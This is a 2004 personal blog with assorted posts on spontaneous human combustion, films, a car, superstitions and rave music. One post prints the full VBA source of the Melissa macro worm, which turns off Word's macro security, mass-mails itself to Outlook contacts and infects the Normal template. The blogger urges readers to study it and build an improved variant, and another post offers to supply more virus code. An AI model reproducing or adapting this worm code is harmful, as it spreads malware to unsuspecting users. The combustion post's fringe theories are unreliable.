What a world to live...

Here I will tell you about almost everything exist in this world. I know maybe my english is not good, but at least you will understand most of what I said. Please give me recommendations, ideas, comments, critics, everything to make my blog better. Thank you for visiting and your time. Peace... Before I forgot, help me by spreading this site to others. Spread it fast like virus...

Tuesday, May 25, 2004

Spontaneous Human Combustion

Ever heard about SHC before? First time I heard about it, it sounds crazy n scary. The tv said that it can happen anytime. So just for example, I am watching Viva La Bam on MTV right now. Suddenly my smokes come out of my body, and not long after that I am a sand man. Dead already, like dead folks being burn to ashes. Well if you don't know, here let me tell you some fact about it.

Spontaneous Human Combustion is the ability of the human body to blister or smoke or otherwise ignite in the absence of an external identifiable known source of ignition. In classic spontaneous human combustion the body burns itself more completely than can normally be achieved at a crematorium. The fires are internal in origin.

Many people believe that Spontaneous Human Combustion was first documented in such early texts as the Bible, but, scientifically speaking, these accounts are too old and secondhand to be seen as reliable evidence. Over the past 300 years, there have been more than 200 reports of persons burning to a crisp for no apparent reason.

The first reliable historic evidence of Spontaneous Human Combustion appears to be from the year 1673, when Frenchman Jonas Dupont published a collection of Spontaneous Human Combustion cases and studies entitled De Incendiis Corporis Humani Spontaneis. Dupont was inspired to write this book after encountering records of the Nicole Millet case, in which a man was acquitted of the murder of his wife when the court was convinced that she had been killed by spontaneous combustion. Millet, a hard-drinking Parisian was found reduced to ashes in his straw bed, leaving just his skull and finger bones. The straw matting was only lightly damaged. Dupont's book on this strange subject brought it out of the realm of folkloric rumor and into the popular public imagination.

On April 9, 1744, Grace Pett, 60, an alcoholic residing in Ipswich England, was found on the floor by her daughter like "a log of wood consumed by a fire, without apparent flame." Nearby clothing was undamaged.

In 1951 the Mary Reeser case recaptured the public interest in Spontaneous Human Combustion. Mrs. Reeser, 67, was found in her apartment on the morning of July 2, 1951, reduced to a pile of ashes, a skull, and a completely undamaged left foot. This event has become the foundation for many a book on the subject of SHC since, the most notable being Michael Harrison's Fire From Heaven, printed in 1976. Fire From Heaven has become the standard reference work on Spontaneous Human Combustion.

On May 18, 1957, Anna Martin, 68, of West Philadelphia, Pennsylvania, was found incinerated, leaving only her shoes and a portion of her torso. The medical examiner estimated that temperatures must have reached 1,700 to 2,000 degrees, yet newspapers two feet away were found intact.

On December 5, 1966, the ashes of Dr. J. Irving Bentley, 92, of Coudersport, Pennsylvania, were discovered by a meter reader. Dr. Bentley's body apparently ignited while he was in the bathroom and burned a 2-1/2-by-3-foot hole through the flooring, with only a portion of one leg remaining intact. Nearby paint was unscorched.

Perhaps the most famous case occurred in St. Petersburg, Florida. Mary Hardy Reeser, a 67-year-old widow, spontaneously combusted while sitting in her easy chair on July 1, 1951. The next morning, her next door neighbor tried the doorknob, found it hot to the touch and went for help. She returned to find Mrs. Reeser, or what was left of her, in a blackened circle four feet in diameter.

All that remained of the 175-pound woman and her chair was a few blackened seat springs, a section of her backbone, a shrunken skull the size of a baseball, and one foot encased in a black stain slipper just beyond the four-foot circle. Plus about 10 pounds of ashes. The police report declared that Mrs. Reeser went up in smoke when her highly flammable rayon-acetate nightgown caught fire, perhaps because of a dropped cigarette.

But one medical examiner stated that the 3,000-degree heat required to destroy the body should have destroyed the apartment as well. In fact, damage was minimal - the ceiling and upper walls were covered with soot. No chemical accelerants, incidentally, were found.

In 1944 Peter Jones, survived this experience and reported that there was no sensation of heat nor sighting of flames. He just saw smoke. He stated that he felt no pain.

Theories about Spontaneous Human Combustion
- Alcoholism - many Spontaneous Human Combustion victims have been alcoholics. But experiments in the 19th century demonstrated that flesh impregnated with alcohol will not burn with the intense heat associated with Spontaneous Human Combustion.
- Deposits of flammable body fat - Many victims have been overweight - yet others have been skinny.
- Devine Intervention - Centuries ago people felt that the explosion was a sign from God of divine punishment.
- Build-up of static electricity - no known form of electrostatic discharge could cause a human to burst into flames.
- An explosive combination of chemicals can form in the digestive system - due to poor diet.
- Electrical fields that exist within the human body might be capable of 'short circuiting' somehow, that some sort of atomic chain reaction could generate tremendous internal heat.

What Remains After a Spontaneous Human Combustion Event
- The body is normally more severely burned than one that has been caught in a normal fire.
- The burns are not distributed evenly over the body; the extremities are usually untouched by fire, whereas the torso usually suffers severe burning.
- In some cases the torso is completely destroyed, the bones being reduced completely to ash.
- Small portions of the body (an arm, a foot, maybe the head) remain unburned.
- Only objects immediately associated with the body have burned; the fire never spread away from the body. SHC victims have burnt up in bed without the sheets catching fire, clothing worn is often barely singed, and flammable materials only inches away remain untouched.
- A greasy soot deposit covers the ceiling and walls, usually stopping three to four feet above the floor.
- Objects above this three to four foot line show signs of heat damage (melted candles, cracked mirrors, etc.)
- Although temperatures of about 3,000 degrees Fahrenheit are normally required to char a body so thoroughly (crematoria, which usually operate in the neighborhood of 2,000 degrees, leave bone fragments which must be ground up by hand), frequently little or nothing around the victim is damaged, except perhaps the exact spot where the deceased ignited.

Monday, May 24, 2004

My promise to you

Remember the internet world was collapsed and so crazed over a virus called "melissa" hit the net? Well somehow I got the coding for that virus. Of course it won't do anything to you, it's just text, not executable files. So don't worry. But if you plan to use it, think again. Cause it won't be a good idea, not because of you'll get caught by some law slaves. But because of it's outdated, there are already a lot of anti virus for MELISSA. It's a good thing if you take a look at this coding, study it and recreate a new one by covering every aspect of it's weaknesses. But don't tell anyone that I recommend you to do this. I am here only giving information. Well here it is, have fun learning it.

/////////////////////////////////////////////////////////////////////////////////
Private Sub AutoOpen()
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
/////////////////////////////////////////////////////////////////////////////////

Friday, May 21, 2004

Computer virus for free...

Read this article. If you find it interesting and wants to get a piece of this material, just let me know and I'll work on it.

Criminals who have infected computers worldwide with destructive viruses and worms are sharing the code of their work online, encouraging others to create copycats that are just as disruptive as the originals.

Multiple versions of notorious computer bugs such as MyDoom, Beagle and Netsky, which are spread through e-mail, are circulating in the cyber-crime community.

The amount of code publicly available rose 5 percent in 2003, according to Symantec, a Cupertino, Calif., Internet security company that tracks viruses.

By sharing their code, virus and worm writers allow just about anyone to replicate their work, increasing the risk of infection for all computers.

Among the most damaging copycat worms in recent months was SoBig.F, the sixth version of the SoBig worm, which infected millions of computers and spread more than 1 billion unwanted e-mail messages in August. SoBig.F spread to more computers than any of its predecessors.

The MyDoom worm, which appeared in February and spread to millions of computers worldwide, has at least seven versions. The latest is programmed to flood Symantec's Web site with information in an attempt to shut it down. Symantec sells software to block viruses and worms.

The recent worms Netsky and Beagle each have at least 14 versions. Nearly all the codes designed to disrupt computers in recent months are considered worms rather than viruses because they are capable of spreading on their own. Viruses can spread only if a user performs an action, such as passing a computer disk or transferring a file over the Internet.

Analysts said the original versions of the most recent worms were likely to have been written by skilled programmers. But the variants could be written by anyone with access to the original code.

"People are able, with less sophisticated computer programming skills, to create these threats," said Sharon Ruckman, a senior director with Symantec.

An 18-year-old high school student was arrested in August. He was charged with creating a variant of the Blaster worm, which spread through computer networks to millions of computers. The teenager admitted to authorities that he found code from the original Blaster worm online and simply made minor changes. When he was arrested, he reportedly had been operating a Web site containing code to some viruses and worms.

The most common threats to computer users are worms that spread through e-mail. Worms can infect a computer when the user opens an e-mail attachment containing the worm. Once the attachment opens, the worm spreads to anyone listed in that computer's e-mail address book. Often the worm creates a hole allowing hackers to steal personal information or send unwanted e-mail, or spam.

Symantec has reported finding found more than 38,000 Web sites containing source code for viruses and worms. In most instances, authorities are able to shut the sites down, but analysts also think that source code is transferred over the Internet in ways that are more difficult to trace. Virus and worm writers use small mailing lists, chat rooms and instant-messaging programs, as well as file-sharing networks such as Kazaa.

Analysts believe that only a small number of people have been given access to the source code of the most disruptive worms. But that hasn't stopped the variants from infecting millions of computers.

"A lot of people are getting hit with these, especially when you see the e-mail viruses," Miss Ruckman said.

Thursday, May 20, 2004

Movies of all times

Have you guys watch any of these movies? I really think these movies are the best for everybody young, adult, old, dead people, etc. No one will ever get enough of these movies eventhough already watched like 10 times. Are you with me? Or you think my taste is not good enough?

Here they are:
1. Star Wars (1977), dir. George Lucas
2. The Godfather (1972), dir. Francis Ford Coppola
3. Pulp Fiction (1994), dir. Quentin Tarantino
4. Casablanca (1942), dir. Michael Curtiz
5. Gone With The Wind (1939), dir. Victor Fleming
6. Raiders of the Lost Ark (1981), dir. Steven Spielberg
7. Schindler's List (1993), dir. Steven Spielberg
8. Citizen Kane (1941), dir. Orson Welles
9. The Empire Strikes Back (1980), dir. Irvin Kershner
10. It's A Wonderful Life (1946), dir. Frank Capra
11. The Silence of the Lambs (1991), dir. Jonathan Demme
12. Braveheart (1995), dir. Mel Gibson
13. E.T. - The Extra-Terrestrial (1982), dir. Steven Spielberg
14. The Godfather Part II (1974), dir. Francis Ford Coppola
15. Forrest Gump (1994), dir. Robert Zemeckis
16. Apocalypse Now (1979), dir. Francis Ford Coppola
17. 2001: A Space Odyssey (1968), dir. Stanley Kubrick
18. The Shawshank Redemption (1994), dir. Frank Darabont
19. The Wizard of Oz (1939), dir. Victor Fleming
20. Independence Day (1996), dir. Roland Emmerich
21. GoodFellas (1990), dir. Martin Scorsese
22. Blade Runner (1982), dir. Ridley Scott
23. Return of the Jedi (1983), dir. Richard Marquand
24. Jaws (1975), dir. Steven Spielberg
25. Beavis and Butt-Head Do America (1996), dir. Mike Judge
26. Die Hard (1988), dir. John McTiernan
27. One Flew Over The Cuckoo's Nest (1975), dir. Milos Forman
28. The Sound of Music (1965), dir. Robert Wise
29. Dr. Strangelove or: How I Learned To Stop Worrying And Love The Bomb (1964), dir. Stanley Kubrick
30. The Usual Suspects (1995), dir. Bryan Singer
31. Ace Ventura: Pet Detective (1994), dir. Tom Shadyac
32. Lawrence of Arabia (1962), dir. David Lean
33. A Clockwork Orange (1971), dir. Stanley Kubrick
34. Taxi Driver (1976), dir. Martin Scorsese
35. The Graduate (1967), dir. Mike Nichols
36. Terminator 2: Judgment Day (1991), dir. James Cameron
37. The Terminator (1984), dir. James Cameron
38. Fargo (1996), dir. Joel Coen
39. North By Northwest (1959), dir. Alfred Hitchcock
40. Rear Window (1954), dir. Alfred Hitchcock
41. Raging Bull (1980), dir. Martin Scorsese
42. Grease (1978), dir. Randal Kleiser
43. Singin' In The Rain (1952), dir. Stanley Donen and Gene Kelly
44. Reservoir Dogs (1992), dir. Quentin Tarantino
45. Psycho (1960), dir. Alfred Hitchcock
46. Aliens (1986), dir. James Cameron
47. Annie Hall (1977), dir. Woody Allen
48. Vertigo (1958), dir. Alfred Hitchcock
49. Dances With Wolves (1990), dir. Kevin Costner
50. The Princess Bride (1987), dir. Rob Reiner
51. Top Gun (1986), dir. Tony Scott
52. Unforgiven (1992), dir. Clint Eastwood
53. Seven (1995), dir. David Fincher
54. West Side Story (1961), dir. Robert Wise, Jerome Robbins
55. Chinatown (1974), dir. Roman Polanski
56. The Piano (1993), dir. Jane Campion
57. Field of Dreams (1989), dir. Phil Alden Robinson
58. The Rock (1996), dir. Michael Bay
59. Trainspotting (1996), dir. Danny Boyle
60. Jerry Maguire (1996), dir. Cameron Crowe
61. The Deer Hunter (1978), dir. Michael Cimino
62. (Monty Python's) Life of Brian (1979), dir. Terry Jones
63. Some Like It Hot (1959), dir. Billy Wilder
64. Jurassic Park (1993), dir. Steven Spielberg
65. The Bridge On The River Kwai (1957), dir. David Lean
66. Indiana Jones and the Last Crusade (1989), dir. Steven Spielberg
67. The Maltese Falcon (1941), dir. John Huston
68. Twister (1996), dir. Jan De Bont
69. Ben-Hur (1959), dir. William Wyler
70. Heat (1995), dir. Michael Mann
71. When Harry Met Sally...(1989), dir. Rob Reiner
72. The Philadelphia Story (1940), dir. George Cukor
73. Back to the Future (1989), dir. Robert Zemeckis
74. Apollo 13 (1995), dir. Ron Howard
75. Rocky (1976), dir. John G. Avildsen
76. Blue Velvet (1986), dir. David Lynch
77. Amadeus (1984), dir. Milos Forman
78. Speed (1994), dir. Jan De Bont
79. Dead Poets Society (1989), dir. Peter Weir
80. Rain Man (1988), dir. Barry Levinson
81. The Good, the Bad, and the Ugly (1966), dir. Sergio Leone
82. Midnight Cowboy (1969), dir. John Schlesinger
83. Manhattan (1979), dir. Woody Allen
84. The Lion King (1994), dir. Roger Allers, Rob Minkoff
85. Platoon (1986), dir. Oliver Stone
86. Brazil (1985), dir. Terry Gilliam
87. All About Eve (1950), dir. Joseph Mankiewicz
88. Raising Arizona (1987), dir. Joel Coen
89. The Breakfast Club (1985), dir. John Hughes
90. The Quiet Man (1952), dir. John Ford
91. Doctor Zhivago (1965), dir. David Lean
92. A Time to Kill (1996), dir. Joel Schumacher
93. Breakfast at Tiffany's (1961), dir. Blake Edwards
94. A Few Good Men (1992), dir. Rob Reiner
95. Tootsie (1982), dir. Sydney Pollack
96. The Fugitive (1993), dir. Andrew Davis
97. The English Patient (1996), dir. Anthony Minghella
98. Toy Story (1995), dir. John Lasseter
99. Alien (1979), dir. Ridley Scott
100.Patton (1970), dir. Franklin Schaffner

Wednesday, May 19, 2004

New sex method....

Ok. For this blog, I only do copy and paste from cnn.com. I hope they don't mind. Please don't tell any of cnn crew about this. Haha. Well I only copy and paste cause I think that this story is really interesting. Have fun reading it. And if you are interested, have fun too in trying it...

"Toothing" is a new craze where strangers on trains, buses, in bars and even supermarkets hook up for illicit meetings using messages sent via the latest in phone technology.

"Toothing is a form of anonymous sex with strangers -- usually on some form of transport or enclosed area such as a conference or training seminar," says the "Beginner's Guide To Toothing" on a Web site dedicated to the pursuit.

It is made possible by Bluetooth technology which allows users to send phone contacts, pictures and messages to other Bluetooth-enabled equipment over a range of about 10 meters (yards).

Users discovered they could send anonymous messages to people they did not know with Bluetooth equipment, spawning a craze dubbed "bluejacking."

Jon, aka "Toothy Toothing" and the guide's author, explained toothing was born after he was "bluejacked" by an unknown girl while commuting to work in London.

After a few days of flirting, she suggested a brief encounter in a station lavatory.

"The meeting wasn't a romantic thing -- it was purely sexual. Barely anything was said," he told Reuters via e-mail.

He said potential toothers begin by sending out a random greeting -- usually "Toothing?"

"If the other party is interested, messages are exchanged until a suitable location is agreed -- usually a public toilet, although there are tales of more adventurous spots such as deserted carriages or staff areas," his guide adds.

Jon, who's in his 20s and works in finance, estimates there could be tens of thousands of toothers from all sorts of professions and lifestyles. Certainly the Web site's message board is busy.

"Any toothing on these trains?" asks one poster about services between Cambridge and London, prompting positive responses from "Dannyboy" and "Zeke."

"I'll be around London Bridge mainline station around 9.45 - 10 a.m. tomorrow if anyone's interested...," another poster called "Boi" wrote hopefully.

While some happily recount their successful encounters, others suggest there are a few teething problems with toothing.

"I tried toothing in Tooting (south London) last night ... not a device to be found," a frustrated "Snowdog" posted sadly.

Although clearly not what the industry had in mind, toothing may lead operators towards similar, more mainstream projects.
Novelty factor

Last month it was reported that a team in Boston had created a service for cell phones called Serendipity, an wireless alternative to online dating.

It allows subscribers to store their personal details and what they want from a partner and when there are enough similarities between two people and they happen to be in the same area, it tells their phones to communicate with each other.

Dario Betti, of the British-based consultancy Ovum, said bluejacking had really taken off, helped by the fact the service was free.

"The element of the unknown, that you are connecting to someone around you that you might not know, it's a novelty factor that is helping it to start," he told Reuters.

If Jon and those who use his forum are right, toothing is certainly livening up life for some bored commuters.

"A lot of my day's taken up with a soul-aching commute into the city, and that just feels like dead time," Jon said.

"Flirting is fun, sex is fun. We're just employing expensive, complex toys to find the most basic form of entertainment.

Tuesday, May 18, 2004

Maybach, worth it or not???

Let's say that you've just won the lottery. Chances are that one of the first things you would buy is a new car. What kind of car would you get? It really depends on how much money you want to spend and what kind of image you want to portray as you drive around.

For example, let's say that you would like to blow $50,000 on a car. There are a lot of options. Everything from a new Corvette to a Hummer 2, along with all sorts of foreign and domestic sedans and SUVs, fill the bill.

If you want to spend $100,000 on a car, the choices are a bit more limited. For example, you might choose a BMW 760, a Mercedes S600, or a Porsche Cayenne.

All the premium automotive brands that we see advertising on television top out around $100,000 Mercedes, BMW, Jaguar, Volvo, etc. If you want to spend significantly more than $100,000, you start stretching into the realm of the exotic sports cars the hand-built Ferraris and Lamborghinis or into the realm of the ultra luxury sedan. The luxury sedan niche is typified by the Rolls Royce.

Now there is a new player for the luxury sedan crown the Maybach (pronounced my-bok). Maybachs come in two models the 57 and the 62 and are priced between $300,000 and $400,000. Only a thousand or so are handmade every year.

With my blog, you will have the chance to get familiar with the Maybach so that you can recognize these cars and know what's under the hood the next time you see one driving by.

A Maybach is a high end, ultra luxury sedan. It can hold up to four passengers in regal splendor. Prices range from $300,000 to $400,000. The 57 is 5.7 meters long, and the 62 is 6.2 meters long, hence the model names. The two models are very nearly identical except for the length. The extra length of the 62 is used to increase the rear seat leg room.

The Maybach 62 also offers several options unavailable in the 57. For example, the 62 has fully reclining rear seats because it has extra leg room available in the rear to accommodate them.

The 62 also offers a huge skylight in the roof (known officially as the electro-transparent panoramic glass roof). The glass in this skylight can be electronically changed between clear, frosted or completely opaque depending on your mood (see How Smart Windows Work to find out about this technology).

It has every creature comfort you can imagine, and several that you may have never thought of. The list of standard and optional features includes:

-A built in refrigerator, operated by its own compressor
-The previously mentioned electro transparent panoramic glass roof
-Solar cells built into the roof to operate a ventilation system while the car is parked
-Ten air bags: four normal airbags for all four passengers, four side impact airbags and two curtain airbags
-Charcoal and pollen filters to clean incoming air
-Ambient lighting
-Writing desks that unfold from the armrests
-DVD player in the back seat and two screens embedded in the backs of the front seats, along with a TV tuner and a 6 disc CD changer with cordless headphones
-Curtains to cover rear and side windows
-Two cell phones
-Automatic door unlocking and ignition using a fob transmitter (When you approach the car, it unlocks; when you touch the gear selector knob, it starts.)
-Heated seats and steering wheel
-Optional fully reclining rear seats with built in massage
-Intercom between front and rear seats
-Retractable window between front and rear seats, with electro frosting when desired
-Bose sound system, 600 watts with 21 speakers
-Navigation system, self monitoring tires, telediagnostics, etc.
-100 wood veneer accent pieces and leather throughout

The Maybach Guard is an upgraded version of the Maybach that offers enhanced B4 level security for the occupants of the vehicle. B4 level security means that someone attacking the car with a blunt instrument (like a bat) or a handgun up to .44 caliber at point blank range will be unable to disable the vehicle or harm the passengers.
Maybach Guard vehicles are built from the ground up on the assembly line, the features are not added on after the fact. This allows a Maybach Guard vehicle to look identical to a standard Maybach.

Features include:
-Reinforced steel in areas like the roof, rear wall, firewall, doors and floor
-Kevlar® blankets, similar to those used in body armor, to absorb bullets that pass through the steel
-Bulletproof glass in all windows
-Special overlapping protection zones around door and window seams to prevent bullet entry
-Protected fuel tank
-Run-flat tires
-There is also a special alarm system, including alarm activation buttons at every seat, along with an intercom system to allow communication with people outside the vehicle without opening a window.

And yet, look at the important performance figures*. In 0 to 60-mph (0-97 kph) acceleration, the Maybach 57 and the Corvette are equal 4.9 seconds. In 0 to 80-mph (0-129 kph) acceleration, the Maybach is actually one-tenth of a second quicker 7.8 seconds for the Maybach versus 7.9 seconds for the Corvette.

In terms of braking, the Maybach 57 is actually better than the Corvette. Braking from 60 mph (97 kph), the Maybach takes 121 feet (37 meters). The Corvette takes 134 feet (41 meters). From 80 mph, the Maybach takes 212 feet (65 meters) versus 214 feet (65 meters) for the Corvette.

In the slalom, you would expect the Corvette to obliterate the Maybach, given that the Corvette is 3,000 pounds lighter and 4 feet shorter. But the speed through the 700-foot slalom is incredibly close 62.4 mph (100.4 kph) for the Corvette and 60.4 mph (97.2 kph) for the Maybach.

You must be thinking like this "How is this possible? How can a huge car like a Maybach match a sports car like the Corvette in terms of performance? This raysa guy is nuts, no knowledge about car whatsoever."

Now let me tell you how it is possible. It starts with the engine. While the Corvette's engine is slightly larger 5,665 cubic centimeters (cc) versus 5,513 cc for the Maybach. The Maybach's is a high tech V12. The Maybach engine has features such as:
-Three valves per cylinder and overhead cams
-Variable valve timing
-Variable length intake manifolds
-Dual turbochargers with intercooler that can produce 18.9 psi of boost

This all adds up to an engine that produces 543 horsepower compared to 350 horsepower for the Corvette. The extra horsepower means that the power to weight ratios of the two cars are nearly identical. On the braking side, the Maybach is very well endowed. The Maybach has huge disc brake rotors at 14.8 inches up front and 14 inches in the back. The Maybach actually has six brake calipers instead of the normal four two calipers on each front wheel. The entire braking system is redundant and computer controlled so that the CPU can decide which calipers to activate and how much pressure to apply to each. Computer control also allows special software features to be added. For example, if your foot comes off the accelerator rapidly, the braking system notices. The braking system assumes that, a few milliseconds later, you will be hitting the brakes for a panic stop. So, during those few milliseconds, the computer can move the brake pads into position against the rotors to allow quicker brake activation.

To handle the slalom, the Maybach has another computer controlled system the car has air shocks that can auto level the vehicle during acceleration, cornering and braking. The shocks also have adjustable internal dampers to control the stiffness of the suspension.

The performance equation for the Maybach is simple: The engineers have brought every possible piece of technology into this car to make it behave like a sports car.

Before I end my blog about Maybach, you must think that this car is very expensive and the price is just so not worth it. Well think again. Here are the comparisons.
A Maybach seems expensive, but if you look at the price per pound for various vehicles, it seems less outrageous. Here's a quick comparison:

-Space Shuttle: Costs $2.1 billion, weighs 170,000 pounds = $12,000 per pound
-Gold: Approximate 2003 spot price of about $400 per ounce = $6,400 per pound
-Lear jet 45: Costs approximately $10 million, weighs 15,000 pounds = $650 per pound
-High-end carbon fiber bicycle: Costs $3,000, weighs 20 pounds = $150 per pound
-Segway: costs $5,000, weighs 80 pounds = $62.50 per pound
-Maybach: Costs $300,000, weighs 6,100 pounds = $49.10 per pound
-Harley Davidson VSRC motorcycle: costs $18,000, weighs 600 pounds = $30 per pound
-USS Ronald Reagan (nuclear-powered aircraft carrier): costs $4.3 billion, weighs 90,000 tons = $24 per pound (plus, it comes with a 20-year supply of fuel already in the reactor)
-Hummer 2: costs $52,000, weighs 6,400 pounds = $8.13 per pound
-Ford Focus: costs $14,000, weighs 2,600 pounds = $3.57 per pound

Well then now I'm done with my blog. Sorry for no update of blog for a few days. It's been a hard time for me researching about this maybach. I just want to present you the best you can get.

Friday, May 14, 2004

Have you occur to do or be in these situations?

In this blog I will tell you some general bad luck signs. It is up to you to believe it or not. I am just telling you. If u happen to get bad luck by trying to prove me wrong, don't blame me. Here are some signs you may want to try to prove me wrong...

- Friday the Thirteenth - The Scandinavian's believed that the number 13 was unlucky due to the mythological 12 demigods being joined by a 13th, an evil one, who brought misfortune upon humans. It was also said that Christ was crucified on Friday and the number of guests at the party of the Last Supper was 13, with the 13th guest being Judas, the traitor.
- Walking under a ladder - A leaning ladder forms a triangle with the wall and ground. Triangles represent the Holy Trinity, and violating the Trinity by breaking it (walking through it) would put you in league with the devil himself.
- Black Cats - In ancient Egypt, the Goddess Bast was a black, female cat. Christians, wanting to rid society of all traces of other religions, convinced the ignorant that black cats were demons in disguise and should thus be destroyed. In the process, they also destroyed the kindly ladies who cared for the cats, believing them to be witches. Being demons, a black cat crossing your path would create a barrier of evil, cutting you off from God and blocking the entrance to heaven.
- Spilling Salt - Salt used to be an expensive commodity used mainly for medicinal purposes. For this reason, spillage was to be avoided at all costs. The idea that it is unlucky to do so probably stems from the belief that Judas spilt salt during the last supper. Throwing spilt salt over the left shoulder is linked to its medicinal use. If it could not be administered, the next best thing was to throw it into the eye of the evil spirits that brought sickness upon us. These spirits were thought to lurk behind your shoulder, waiting for an opportunity to strike.
- If a dog suddenly barks for no apparent reason in a house that has a sick person then
- You must wear new clothes at Easter or you will have bad luck
- There will be an argument if knifes are crossed at a table. Also, if a lover gives you a
- Breaking a mirror means 7 years of bad luck, unless you take the pieces outside & bury them in moonlight. Also, an undisturbed mirror in a house suddenly fall & smashes then it means that there will soon be a death.
- Unless you were born in October, the wearing of an Opal will be ill-fated
- If pepper is spilt, then you will have a serious argument with a friend.
- Sparrows are said to carry the souls of the deceased to the after-life. To kill one means that you will be cursed.
- It is extremely unlucky to open an umbrella inside a house.
- If a groom drops the ring during the ceremony then the marriage is doomed to failure.
- Breaking a plate, especially if it had not already been cracked.
- To see the new moon for the first time through glass. Upon seeing the new moon you should turn whatever silver you have in your pockets or handbag, and thus ensure prosperity for a month.
- The blossom must never be cut from the tree and brought into the house before May 1, or ill fortune will attend you.
- Never mend a garment while you are wearing it, or misfortune will follow.
- Breaking a mirror portends seven years of bad luck. It is also extremely unlucky to receive a mirror as a present
- To make a present of a knife or any other sharp instrument unless you receive something in exchange.
- Walking under a ladder, unless you cross their fingers while doing so.
- It brings ill fortune if a lease or any contract is signed in the months of April, July, or November.
- To spill ink threatens worry, annoyance, and the failure of a project that is on foot.
- Crossing two table-knives by accident portends bad luck.
- To give a pair of gloves to a friend unless you receive something in exchange.
- To encounter a gravedigger coming towards you. Usually this means there will be a severe illness.
- For those who completely rake out a fire before retiring. A few embers should always be left.
- To break a glass bottle portends misfortune
- If you fasten a button into the wrong buttonhole
- if a candle falls over
- For a golfer to borrow your partners umbrella
- Throwing stones into the sea cause bad luck
- Starting a cruise on a Friday
- Stepping on board a ship with your left foot
- To open an umbrella in the house
- It is unlucky to sit on a table unless one foot is touching the ground
- If a person stumbles when leaving his house at the beginning of a journey, or trips or stumbles more than once during the course of the journey, it is advisable to postpone it.
- To pass anyone on the staircase.
- New shoes should never be left on a table
- To put on the left shoe before the right, and it is worse still to put the right shoe on the left foot, or vice versa.
- Spilling salt. If both salt and pepper are spilt at the same time, the force of this ill omen is doubled.
- You will have bad luck if you do not stop the clock in the room where someone dies.
- It's bad luck to count the cars in a funeral cortege.
- It's bad luck to meet a funeral procession head on.

Thursday, May 13, 2004

Ravers wannabe guide...

For you all out there who wants to become a raver. Let me tell you some genre of musics out there which are popular. There are a lot of subgenres within the techno scene. Many people find it hard to tell the difference between the subgenres, but to a real raver, the difference is as meaningful as any rocker fan might find between soft rock, glam rock, pop rock, hard rock, heavy metal, or other type of rock (I don't know what else)... to them, it is a difference that will effect them real bad.

- Techno: The term techno is at once used to refer to the scene as a whole and also a particular facet of it. For most people, techno (proto-techno, Detroit techno, or hardcore techno) is the music of the scene. Techno is the most minimalist, the most mechanical, and perhaps the least soulful of all the subgenres. It's definitely the most aggressive, loudest, harshest, severe, and pounding; frequently hardcore wins over metal, punk, and industrial. Example of widely know groups of techno are Kraftwerk and Cybotron.

- Rave (also Techno/Rave, not to be confused with raves as events): This style is usually more soft and accessible than techno, and more likely to win transform from pop. It usually features female vocals and an easier, less tune. Most people think it's a lot easier to dance to. Rave is more melodic than hardcore techno. Big name rave groups are the Shamen and LA Style.

